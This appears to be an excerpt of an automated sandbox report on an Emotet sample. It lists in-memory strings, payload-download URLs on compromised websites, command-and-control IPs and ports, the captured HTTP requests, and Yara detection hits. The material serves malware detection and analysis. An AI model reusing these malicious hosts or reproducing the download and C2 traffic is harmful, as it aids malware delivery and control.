        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertif
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D846725000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: regsvr32.exe, 00000004.00000003.1860943829.0000000000D79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
        Source: regsvr32.exe, 00000004.00000003.1860943829.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1863481873.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com//
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D8466F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/xM
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/
        Source: wscript.exe, 00000001.00000003.1417301254.000002D845C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/_
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/yM
        Source: wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.co
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
        Source: wscript.exe, 00000001.00000003.1417301254.000002D845C83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0
        Source: wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/dll
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/4
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/P
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/Y
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000CEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/)
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/M
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz//
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/bK
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/z
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/)
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/l
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnX
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLL
        Source: regsvr32.exe, 00000004.00000002.2661608245.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/
        Source: regsvr32.exe, 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/
        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000D08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/X
        Source: regsvr32.exe, 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/dllgz
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
        Source: wscript.exe, 00000001.00000003.1531992780.000002D8464BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552238532.000002D8464BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/476
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
        Source: wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll(
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
        Source: wscript.exe, 00000001.00000003.1531992780.000002D8464BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552238532.000002D8464BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/cw34006
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
        Source: wscript.exe, 00000001.00000003.1537553114.000002D84656F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542696917.000002D846570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1540601110.000002D846570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1534710579.000002D846568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1545756551.000002D846570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/
        Source: wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D84672F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/0w
        Source: wscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/l
        Source: wscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM
        Source: wscript.exe, 00000001.00000002.1554710807.000002D846747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/s
        Source: unknownHTTP traffic detected: POST /wfqhlvcfruxkwghn/ivirkxueekmcz/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 164.90.222.65
        Source: unknownDNS traffic detected: queries for: penshorn.org
        Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
        Source: global trafficHTTP traffic detected: GET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbvoyage.com
        Source: global trafficHTTP traffic detected: GET /logs/pd/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.gomespontes.com.br
        Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.3:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 31.31.196.172:443 -> 192.168.2.3:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 186.202.153.5:443 -> 192.168.2.3:49729 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 164.90.222.65:443 -> 192.168.2.3:49737 version: TLS 1.2

        E-Banking Fraud

        barindex
        Yara detected Emotet
        Source: Yara matchFile source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 3.2.regsvr32.exe.460000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.regsvr32.exe.460000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.1501910088.0000000000460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
